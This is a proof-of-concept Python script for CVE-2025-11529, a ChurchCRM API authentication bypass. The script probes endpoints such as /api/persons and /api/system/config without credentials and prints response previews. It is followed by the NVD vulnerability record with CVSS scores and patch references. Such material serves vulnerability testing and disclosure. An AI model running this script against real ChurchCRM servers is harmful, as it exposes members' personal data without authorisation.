CVE-2025-11529

# CVE-2025-11529 PoC - ChurchCRM API Authentication Bypass # This PoC demonstrates the missing authentication vulnerability # in ChurchCRM's AuthMiddleware component import requests # Target ChurchCRM instance TARGET_URL = "http://target-churchcrm.example.com" # Vulnerable API endpoints that should require authentication # but are accessible without credentials due to AuthMiddleware flaw API_ENDPOINTS = [ "/api/persons", "/api/families", "/api/groups", "/api/users", "/api/dashboard", "/api/system/config", ] def exploit_auth_bypass(base_url, endpoint): """ Attempt to access protected API endpoint without authentication. Due to CVE-2025-11529, the AuthMiddleware fails to enforce authentication on API requests. """ url = f"{base_url}{endpoint}" # Send request WITHOUT any authentication credentials # No cookies, no API keys, no session tokens headers = { "Accept": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[VULNERABLE] {endpoint} - Status: {response.status_code}") print(f" Response preview: {response.text[:200]}") return True else: print(f"[PROTECTED] {endpoint} - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[ERROR] {endpoint} - {str(e)}") return False def main(): print(f"[*] Testing CVE-2025-11529 against {TARGET_URL}") print(f"[*] ChurchCRM AuthMiddleware Authentication Bypass\n") vulnerable_count = 0 for endpoint in API_ENDPOINTS: if exploit_auth_bypass(TARGET_URL, endpoint): vulnerable_count += 1 print(f"\n[*] Results: {vulnerable_count}/{len(API_ENDPOINTS)} endpoints vulnerable") if vulnerable_count > 0: print("[!] Target is VULNERABLE to CVE-2025-11529") print("[!] Recommended: Upgrade to ChurchCRM version with fix") print("[!] Patch: 3a1cffd2aea63d884025949cfbcfd274d06216a4") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11529", "sourceIdentifier": "[email protected]", "published": "2025-10-09T03:15:31.830", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in ChurchCRM up to 5.18.0. This impacts the function AuthMiddleware of the file src/ChurchCRM/Slim/Middleware/AuthMiddleware.php of the component API Endpoint. The manipulation results in missing authentication. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The patch is identified as 3a1cffd2aea63d884025949cfbcfd274d06216a4. A patch should be applied to remediate this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.0", "matchCriteriaId": "E88638D7-92B8-4BBC-97B9-827F4D6E6589"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/commit/3a1cffd2aea63d884025949cfbcfd274d06216a4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ChurchCRM/CRM/pull/7376", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/uartu0/advisories/blob/main/churchcrm-api-auth-bypass-2025.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327667", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327667", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.669916", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/uartu0/a ... (truncated)